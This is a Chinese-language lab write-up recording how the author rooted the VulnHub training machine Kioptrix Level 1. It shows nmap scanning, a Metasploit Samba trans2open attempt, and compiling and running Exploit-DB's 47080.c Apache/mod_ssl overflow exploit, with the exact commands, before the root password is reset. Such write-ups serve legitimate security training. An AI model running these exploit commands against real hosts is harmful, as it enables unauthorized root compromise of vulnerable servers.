kioptrix.level1 -VulnHub靶机学习记录
环境
目标主机:kioptrix.level1 192.168.1.104
攻击机 :kali 192.168.1.109
知识点
-
nmap
-
searchsploit
-
metaspaloit
-
samba 缓冲区溢出
-
Apache/mod_ssl 缓冲区溢出
-
gcc编译
主机发现
arp-scan -l
或者netdiscover -r 192.168.1.0/24
主机端口扫描
nmap -sV -p- 192.168.1.104
-sV 用来扫描目标主机和端口上运行的软件的版本
-p xxx 扫描指定端口xxx
-p- 扫描0-65535全部端口
发现有Samba、Apache OpenSSL服务
利用samba
kali下命令:msfconsole启动metaspaloit, search samba
命令: use exploit/linux/samba/trans2open
meterpreter一直died。。。。无法获取shell,解决方法是msf使用模块payload
利用Apache OpenSSL服务
这儿可以使用kali自带漏洞数据库:searchsploit是一个用于Exploit-DB的命令行搜索工具,支持更新
或者进入官网 https://www.exploit-db.com/ 关键词search查找漏洞
这里我选用了47080.c ,桌面新建一文件夹把exp复制过来,gcc编译,先查找下路径
知道路径了,使用cp命令拷贝exp到新建文件夹ssl
看了下编译前得先安装libssl-dev 库,那就安装呗,apt-get install libssl-dev,安装完开始gcc编译,gcc所支持后缀名解释
命令:gcc -o OpenFuck 47080.c -lcrypto
./OpenFuck查看下所需参数
靶机版本RedHat系列,Apache1.3.20,target这儿选用 0x6b
命令:./OpenFuck 0x6b 192.168.1.104 443 -c 40, 最后获得root权限
使用passwd命令重置root密码,成功
使用重置后密码登录靶机root/root ,成功,到此结束。